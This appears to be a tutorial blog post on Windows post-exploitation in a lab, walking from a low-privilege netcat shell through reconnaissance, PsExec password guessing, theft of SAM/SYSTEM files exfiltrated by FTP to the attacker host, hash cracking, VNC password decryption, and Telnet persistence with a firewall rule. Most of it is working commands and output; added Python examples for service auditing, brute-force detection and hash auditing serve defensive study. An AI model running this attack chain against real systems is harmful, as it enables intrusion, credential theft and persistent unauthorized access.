Windows Post Exploitation : Part 1

Windows Post Exploitation 


In this post I'm going to walk through a post-exploitation scenario, starting from a netcat shell with limited user privileges. The goal is to move further into the network without using penetration testing products like Metasploit, Core Impact, CANVAS or others, using the least amount of tools by leveraging the target system's own OS resources.



Reconnaissance
If you want to win, you must know your environment.
 

Start by gathering System related information

C:\>systeminfo
systeminfo

Host Name:                 XP-INTRANET
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          User
Registered Organization:  
Product ID:                76487-OEM-0060233-70102
Original Install Date:     3/1/2011, 6:18:31 PM
System Up Time:            1 Days, 22 Hours, 31 Minutes, 28 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2800 Mhz
BIOS Version:              PTLTD  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon,
                           London
Total Physical Memory:     127 MB
Available Physical Memory: 28 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\XP-INTRANET
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB936929 - Service Pack
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.1.137
                                 IP address(es)
                                 [01]: 10.0.1.138
 
From the systeminfo command we can extract detailed configuration information
about a computer and its operating system, including operating system 
configuration, security information, product ID, and hardware properties, 
such as RAM, disk space, and network cards.

Next we’ll check the available services

Running Services 
C:\>tasklist /svc
tasklist /svc
Image Name                   PID Services                                    
========================= ====== ===========
System Idle Process            0 N/A                                        
System                              4 N/A                                        
smss.exe                        536 N/A                                        
csrss.exe                        592 N/A                                        
winlogon.exe                  616 N/A                                        
services.exe                   660 Eventlog, PlugPlay                          
lsass.exe                        672 PolicyAgent, ProtectedStorage, SamSs        
vmacthlp.exe                 836 VMware Physical Disk Helper Service        
logonui.exe                    848 N/A                                        
svchost.exe                    880 DcomLaunch, TermService                    
svchost.exe                    968 RpcSs                                      
svchost.exe                  1060 AudioSrv, Browser, CryptSvc, Dhcp, dmserver,
                                 ERSvc, EventSystem,                     
                                 FastUserSwitchingCompatibility, helpsvc,    
                                 lanmanserver, lanmanworkstation, Netman,    
                                 Nla, Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, srservice, Themes, TrkWks,
                                 W32Time, winmgmt, wscsvc, wuauserv, WZCSVC   
svchost.exe                 1192 Dnscache                                    
svchost.exe                 1212 LmHosts, RemoteRegistry, SSDPSRV, WebClient
spoolsv.exe                 1416 Spooler                                    
vmtoolsd.exe              1660 VMTools                                    
VMUpgradeHelper.exe  1880 VMUpgradeHelper                            
alg.exe                       1808 ALG                                        
imapi.exe                   1604 ImapiService                                
csrss.exe                    2692 N/A                                        
winlogon.exe               2720 N/A                                        
rdpclip.exe                  2916 N/A                                        
wscntfy.exe                 2920 N/A                                        
explorer.exe                3032 N/A                                        
VMwareTray.exe            352 N/A                                        
logon.scr                    2164 N/A                                        
cmd.exe                     2268 N/A                                        
nc.exe                        1136 N/A                                        
cmd.exe                     4008 N/A                                        
tasklist.exe                 2604 N/A                                        
wmiprvse.exe             3496 N/A

Installed Services

C:\>sc query state= all
sc query state= all 

SERVICE_NAME         : Alerter
DISPLAY_NAME         : Alerter
        TYPE                : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE      : 1077 (0x435)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT               : 0x0
        WAIT_HINT                 : 0x0

SERVICE_NAME         : ALG
DISPLAY_NAME         : Application Layer Gateway Service
        TYPE                : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE     : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT              : 0x0
        WAIT_HINT                : 0x0
...
SERVICE_NAME: WinVNC4
DISPLAY_NAME: VNC Server Version 4
        TYPE                : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE     : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT              : 0x0
        WAIT_HINT                : 0x0
...
SERVICE_NAME: xmlprov
DISPLAY_NAME: Network Provisioning Service
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE             : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE     : 1077 (0x435)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT              : 0x0
        WAIT_HINT                : 0x0
From the information obtained we have a clear picture of the exploited 
machine, and of some system resources that we can leverage, like the VNC 
Server seen above.
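The `sc query state= all` listing is long, and the interesting fields are encoded: TYPE is printed in hex and is a bit mask (0x10 own process, 0x20 shared process, 0x100 interactive, so 110 means an interactive own-process service), STATE is a small decimal (1 STOPPED, 4 RUNNING), and WIN32_EXIT_CODE 1077 means the service has not been started since boot. The parser below turns that output into records and flags interactive services and installed remote-access services (VNC, Telnet, etc.) that an administrator should remove if unused. This is an added example, not a tool from the original post; the sample text is constructed to match the format shown above, and the remote-access keyword list is a heuristic of my own.

```python
"""Parse `sc query state= all` output and flag service properties worth a
second look. Added example for this post (not a tool from the original);
the sample text below is constructed to match the format shown above."""
import re

# dwServiceType flags from winsvc.h (sc prints the field in hex).
SERVICE_KERNEL_DRIVER = 0x001
SERVICE_FILE_SYSTEM_DRIVER = 0x002
SERVICE_WIN32_OWN_PROCESS = 0x010
SERVICE_WIN32_SHARE_PROCESS = 0x020
SERVICE_INTERACTIVE_PROCESS = 0x100

STATE_NAMES = {1: "STOPPED", 2: "START_PENDING", 3: "STOP_PENDING",
               4: "RUNNING", 5: "CONTINUE_PENDING", 6: "PAUSE_PENDING",
               7: "PAUSED"}

ERROR_SERVICE_NEVER_STARTED = 1077  # WIN32_EXIT_CODE: not started since boot

# Display-name keywords suggesting a remote-access service (heuristic).
REMOTE_ACCESS_KEYWORDS = ("vnc", "telnet", "remote desktop", "ssh")

# Constructed sample in the same layout as the page's sc output.
SAMPLE_SC_OUTPUT = """\
SERVICE_NAME: Alerter
DISPLAY_NAME: Alerter
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077 (0x435)
        SERVICE_EXIT_CODE  : 0 (0x0)

SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)

SERVICE_NAME: WinVNC4
DISPLAY_NAME: VNC Server Version 4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)
"""

FIELD_RE = re.compile(r"^([A-Z0-9_]+)\s*:\s*(.*)$")


def parse_sc_query(text):
    """Return one dict per SERVICE_NAME block."""
    services, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "...":
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "SERVICE_NAME":
                cur = {"name": value, "controls": []}
                services.append(cur)
            elif cur is None:
                continue
            elif key == "DISPLAY_NAME":
                cur["display"] = value
            elif key == "TYPE":
                cur["type"] = int(value.split()[0], 16)  # hex: 110 -> 0x110
            elif key == "STATE":
                cur["state"] = int(value.split()[0])  # decimal 1..7
            elif key == "WIN32_EXIT_CODE":
                cur["exit_code"] = int(value.split()[0])
        elif cur is not None and line.startswith("("):
            # accepted-controls line that follows STATE
            cur["controls"] = line.strip("()").split(",")
    return services


def describe_type(t):
    """Expand the TYPE bit mask into its flag names."""
    names = []
    if t & SERVICE_KERNEL_DRIVER:
        names.append("KERNEL_DRIVER")
    if t & SERVICE_FILE_SYSTEM_DRIVER:
        names.append("FILE_SYSTEM_DRIVER")
    if t & SERVICE_WIN32_OWN_PROCESS:
        names.append("WIN32_OWN_PROCESS")
    if t & SERVICE_WIN32_SHARE_PROCESS:
        names.append("WIN32_SHARE_PROCESS")
    if t & SERVICE_INTERACTIVE_PROCESS:
        names.append("INTERACTIVE")
    return "|".join(names) or hex(t)


def audit_services(services):
    """(service, finding) pairs: interactive services and remote-access services."""
    findings = []
    for s in services:
        if s.get("type", 0) & SERVICE_INTERACTIVE_PROCESS:
            findings.append((s["name"], "INTERACTIVE"))
        if any(k in s.get("display", "").lower() for k in REMOTE_ACCESS_KEYWORDS):
            findings.append((s["name"], "REMOTE_ACCESS_SERVICE"))
    return findings


if __name__ == "__main__":
    for s in parse_sc_query(SAMPLE_SC_OUTPUT):
        print(f'{s["name"]:<12} {STATE_NAMES.get(s.get("state"), "?"):<8} '
              f'{describe_type(s.get("type", 0))}')
    print(audit_services(parse_sc_query(SAMPLE_SC_OUTPUT)))
```

Feed it the saved output of `sc query state= all` from any XP/2003 host and the audit list gives you the stopped-but-installed remote-access services to review; a stopped VNC server is still an attack surface because anyone with local admin can start it, as the persistence section of this post shows.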

User Related Information 

Current environment settings 
C:\>set
set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\John\Application Data
CLIENTNAME=iMac
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=XP-INTRANET
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\John
LOGONSERVER=\\XP-INTRANET
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 8, GenuineIntel
PROCESSOR_LEVEL=15
PROCESSOR_REVISION=0208
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=RDP-Tcp#4
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\John\LOCALS~1\Temp
TMP=C:\DOCUME~1\John\LOCALS~1\Temp
USERDOMAIN=XP-INTRANET
USERNAME=John
USERPROFILE=C:\Documents and Settings\John
windir=C:\WINDOWS
 
Filtering the results
Find Username 
C:\>set | find "USERNAME"
set | find "USERNAME"
USERNAME=John

Find Domain 
C:\>set | find "USERDOMAIN"
set | find "USERDOMAIN"
USERDOMAIN=XP-INTRANET
Find Current User Information
C:\>net user John
net user John
User name                        John
Full Name                         John
Comment                    
User's comment              
Country code                     000 (System Default)
Account active                   Yes
Account expires                 Never
Password last set                9/11/2011 1:38 PM
Password expires                Never
Password changeable          9/11/2011 1:38 PM
Password required                  Yes
User may change password     Yes
Workstations allowed         All
Logon script                
User profile                
Home directory              
Last logon                   9/13/2011 8:15 PM
Logon hours allowed          All
Local Group Memberships      *Remote Desktop Users *Users              
Global Group memberships     *None 
The command completed successfully.  
Current User Privileges
Local Group Memberships      *Remote Desktop Users *Users              
Global Group memberships     *None   
Find Users with Administrator Privileges in the current machine
C:\>net localgroup Administrators
net localgroup   Administrators
Alias name       Administrators
Comment         Administrators have complete and unrestricted access 
                       to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Jack
The command completed successfully. 
Note
User accounts other than Administrator tend to have weaker passwords, 
so take note of the Jack account. 
Privilege Escalation

Upload some useful tools using FTP

First make a file containing FTP commands
C:\>cd C:\Docume~1\John
cd C:\Docume~1\John
C:\DOCUME~1\John>echo Bob>ftp.src
echo Bob>ftp.src
C:\DOCUME~1\John>echo bobisyouruncle>>ftp.src
echo bobisyouruncle>>ftp.src
C:\DOCUME~1\John>echo bin>>ftp.src
echo bin>>ftp.src
C:\DOCUME~1\John>echo get PsExec.exe>>ftp.src
echo get PsExec.exe>>ftp.src
C:\DOCUME~1\John>echo get nc.exe>>ftp.src
echo get nc.exe>>ftp.src
C:\DOCUME~1\John>echo get FPipe.exe>>ftp.src
echo get FPipe.exe>>ftp.src
C:\DOCUME~1\John>echo get PassList.txt>>ftp.src
echo get PassList.txt>>ftp.src
C:\DOCUME~1\John>echo bye>>ftp.src
echo bye>>ftp.src 

C:\DOCUME~1\John>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CC58-320F
 Directory of C:\DOCUME~1\John

09/16/2011  11:44 AM    <DIR>          .
09/16/2011  11:44 AM    <DIR>          ..
09/15/2011  01:44 AM    <DIR>          Desktop
09/11/2011  05:35 PM    <DIR>          Favorites
09/16/2011  11:42 AM                69 ftp.src
09/14/2011  11:51 AM    <DIR>          My Documents
03/01/2011  07:10 PM    <DIR>          Start Menu
               1 File(s)             73 bytes
               6 Dir(s)   2,913,312,768 bytes free

Run the FTP client
C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):

bin
get PsExec.exe
get nc.exe
get FPipe.exe
get PassList.txt
bye
C:\DOCUME~1\John>del ftp.src
del ftp.src  
Password Guessing with PsExec  

Username: Jack
Computer Name: XP-INTRANET
Password List: PassList.txt

C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
123456
12345
123456789
password
Password
iloveyou
P4ssw0rd1
princess
rockyou
Password123
1234567
12345678
abc123
P4ssw0rd
Nicole
Simplepass
Daniel
MyPass1
babygirl
monkey
Jessica
Lovely
michael
Ashley
Secret1
***************** Secret1 *****************
654321
Qwerty 
 
Password for Jack: Secret1 
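From the defender's side, the loop above is very loud: every PsExec attempt is a network logon (type 3) that lands in the Security log as event 529 on XP/2003 (4625 on Vista and later), and the correct guess is followed by a 540 (4624) success for the same account from the same source within seconds. The detector below implements that logic over a set of constructed events: it raises a "burst" alert when ten failures for one (source, user) pair fall inside a sixty-second window and a higher-severity "success_after_burst" alert when a success follows such a burst. This is an added example, not part of the original post; the pipe-separated event format is my own simplification, not real event-log output, and the thresholds are assumptions to tune for your environment.

```python
"""Detect a password-guessing burst in Windows logon audit events.
Added example for this post (not from the original); the events are
constructed in a simplified pipe-separated form, not real log output."""
import datetime as dt
from collections import defaultdict, deque

# Event IDs: XP/2003 use 529 (logon failure: bad user name or password)
# and 540 (successful network logon); Vista and later use 4625 / 4624.
FAILURE_IDS = {529, 4625}
SUCCESS_IDS = {528, 540, 4624}
NETWORK_LOGON = 3  # logon type used by SMB-based tools such as PsExec


def constructed_events():
    """25 failures for Jack one second apart, then a success, plus two
    isolated failures for John that must not trigger an alert."""
    base = dt.datetime(2011, 9, 16, 11, 50, 0)
    lines = []
    for i in range(25):
        t = base + dt.timedelta(seconds=i)
        lines.append(f"{t:%Y-%m-%d %H:%M:%S}|529|3|Jack|10.0.1.138")
    t = base + dt.timedelta(seconds=26)
    lines.append(f"{t:%Y-%m-%d %H:%M:%S}|540|3|Jack|10.0.1.138")
    lines.append("2011-09-16 08:15:00|529|2|John|XP-INTRANET")
    lines.append("2011-09-16 08:15:07|529|2|John|XP-INTRANET")
    return lines


def parse_event(line):
    """time|event_id|logon_type|target_user|source  (constructed format)."""
    ts, eid, ltype, user, src = line.split("|")
    return {"time": dt.datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "event_id": int(eid), "logon_type": int(ltype),
            "user": user, "source": src}


def detect_password_guessing(lines, threshold=10, window_seconds=60):
    """Return alerts: 'burst' when `threshold` failures for one (source, user)
    pair fall inside the window; 'success_after_burst' when a successful
    logon follows such a burst, i.e. a guess most likely succeeded."""
    events = sorted((parse_event(l) for l in lines if l.strip()),
                    key=lambda e: e["time"])
    window = dt.timedelta(seconds=window_seconds)
    failures = defaultdict(deque)  # (source, user) -> recent failure times
    burst_reported = set()
    alerts = []
    for e in events:
        key = (e["source"], e["user"])
        q = failures[key]
        while q and e["time"] - q[0] > window:  # expire failures outside the window
            q.popleft()
        if e["event_id"] in FAILURE_IDS:
            q.append(e["time"])
            if len(q) >= threshold and key not in burst_reported:
                burst_reported.add(key)
                alerts.append({"kind": "burst", "user": e["user"],
                               "source": e["source"], "failures": len(q),
                               "at": e["time"]})
        elif e["event_id"] in SUCCESS_IDS:
            if len(q) >= threshold:
                alerts.append({"kind": "success_after_burst", "user": e["user"],
                               "source": e["source"], "failures": len(q),
                               "at": e["time"]})
            q.clear()  # a success resets the counter for this pair
            burst_reported.discard(key)
    return alerts


if __name__ == "__main__":
    for a in detect_password_guessing(constructed_events()):
        print(a)
```

The same rule in a SIEM is a count of failures grouped by source and target account over a short window, joined against the next success for that pair; the account-lockout policy that would have stopped this loop outright is the more important control, and its absence is exactly what lets the loop above run through the whole list.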
Grabbing the Sam and System files 
Sam File  
C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\"
psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0.
 
System File 

C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\"
psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0. 

Make file containing FTP commands
C:\DOCUME~1\John>echo Bob>ftp.src
echo Bob>ftp.src
C:\DOCUME~1\John>echo toor>>ftp.src
echo toor>>ftp.src
C:\DOCUME~1\John>echo bin>>ftp.src
echo bin>>ftp.src
C:\DOCUME~1\John>echo put sam>>ftp.src
echo put sam>>ftp.src
C:\DOCUME~1\John>echo put system>>ftp.src
echo put system>>ftp.src
C:\DOCUME~1\John>echo bye>>ftp.src
echo bye>>ftp.src  


Uploading the files to the attacker machine
C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):

bin
put sam
put system
bye  
 
Password Cracking
Extract Hashes from the sam and system file with samdump2  
 
root@bt:~# samdump2 sam system >hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@bt:~# cat hashes.txt
Administrator:500:2087ec72c3dcba83d5367c170aa9b994:b8813ba5b424db4b6dcac460d84c127b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a24902c1f8098ab6b4a2760e3a0920ab:5d6d47bbb13ca7fddc038b99a07c333d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b5968af5ca7feec3bc364f8bf7978c8b:::
Password cracking with John the Ripper using a wordlist 
root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt 
--rules /root/hashes.txt
Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
Secret1          (Jack)
Simplepass       (John)
P4ssw0rd         (Administrator)
guesses: 3  time: 0:00:00:00 100.00% (ETA: Fri Sep 16 21:53:18 2011)  c/s: 5591K 
 trying: Skidoing - Zhongguing 
Passwords found:
Jack - Secret1
John - Simplepass
Administrator - P4ssw0rd
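Two things in the samdump2 output explain why John finishes in well under a second. First, NT hashes are unsalted MD4 ("no different salts" in John's banner), so every account with the same password has the same hash and one wordlist pass covers all of them. Second, the LM field tells you whether the far weaker LM hash is being stored: the value aad3b435b51404eeaad3b435b51404ee is the fixed "no LM hash" constant, so Guest and SUPPORT_388945a0 have none, but Administrator and HelpAssistant do, which means LM storage was not disabled on this host. The Guest line also shows 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password. The audit below parses pwdump-style lines and reports those three conditions; it is an added example, not part of the original post, and uses the four hash lines shown above plus two constructed accounts (user_a and user_b, with a made-up shared NT hash) to exercise the duplicate check.

```python
"""Audit pwdump-format lines (user:rid:LM:NT:::) for password-storage
weaknesses. Added example for this post; the first four lines are the ones
shown above, user_a/user_b and their NT hash are constructed."""
from collections import defaultdict

# Well-known constants: the LM field when no LM hash is stored (LM disabled
# or password longer than 14 characters), and the NT hash of an empty
# password (MD4 of the empty UTF-16LE string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_HASHES = """\
Administrator:500:2087ec72c3dcba83d5367c170aa9b994:b8813ba5b424db4b6dcac460d84c127b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a24902c1f8098ab6b4a2760e3a0920ab:5d6d47bbb13ca7fddc038b99a07c333d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b5968af5ca7feec3bc364f8bf7978c8b:::
user_a:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
user_b:1004:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


def parse_pwdump(text):
    """Return one record per non-empty line; reject malformed lines."""
    records = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 4 or len(fields[2]) != 32 or len(fields[3]) != 32:
            raise ValueError(f"line {n}: not a pwdump record")
        records.append({"user": fields[0], "rid": int(fields[1]),
                        "lm": fields[2].lower(), "nt": fields[3].lower()})
    return records


def audit_hashes(records):
    """(account, finding) pairs: LM_STORED, BLANK_PASSWORD, SHARED_PASSWORD."""
    findings = []
    by_nt = defaultdict(list)
    for r in records:
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM_STORED"))
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "BLANK_PASSWORD"))
        else:
            by_nt[r["nt"]].append(r["user"])
    # Unsalted NT hashes: identical hash means identical password.
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((",".join(users), "SHARED_PASSWORD"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_hashes(parse_pwdump(SAMPLE_HASHES)):
        print(f"{finding:<16} {account}")
```

A BLANK_PASSWORD hit on Guest is normal only if the account is disabled, which pwdump output does not show, so check `net user Guest` before dismissing it; an LM_STORED hit on any account is worth a policy change (NoLMHash) followed by a password reset, since the LM hash is what makes the John run trivial.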
Persistence
Start stopped Services to maintain access
Back to the VNC Server Version 4 found previously.
Check the service state
C:\DOCUME~1\John>sc query WinVNC4
sc query WinVNC4
SERVICE_NAME: WinVNC4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,
                                IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0 (0x0)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0   
Grab VNC Password 
C:\DOCUME~1\John>psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg
psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

reg exited with error code 0.  
 
View encrypted VNC Password
C:\DOCUME~1\John>type vnc.reg
type vnc.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]
"Password"=hex:79,9a,a1,cb,85,e9,79,db
"SecurityTypes"="VncAuth"
"ReverseSecurityTypes"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000 

VNC hash 799aa1cb85e979db
 
Decrypt the VNC hash on the attacker machine with vncdec.exe 
C:\>vncdec.exe 799aa1cb85e979db
----------------------------------
RealVNC Password Decrypter
by Jonas Piela, www.jonaspiela.de
----------------------------------
running in hash mode...
----------------------------------
decrypted password: VNCPass
---------------------------------- 
Testing the connection with vncviewer
root@bt:~# vncviewer 10.0.1.138
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "XP-INTRANET"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage 
 

Enable telnet server on the target machine
Note: I advise against using telnet as a persistence method, because 
telnet transmits data in plain readable text. Use SSH instead. In this 
example the goal is to introduce the least amount of tools on the 
target machines, so I'll use telnet.
Set service to automatically start upon boot
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc config tlntsvr start= auto
psexec -u Jack -p Secret1 sc config tlntsvr start= auto

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0
 
Start the Telnet server
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start tlntsvr
psexec -u Jack -p Secret1 sc start tlntsvr

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0..  

Add rule to firewall 
C:\DOCUME~1\John>psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174
psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

netsh exited with error code 0.  

 
Telnet to target machine
root@bt:~# telnet 10.0.1.138
Trying 10.0.1.138...
Connected to 10.0.1.138.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: Jack
password:

*=====================================
Welcome to Microsoft Telnet Server.
*=====================================
C:\Documents and Settings\Jack>
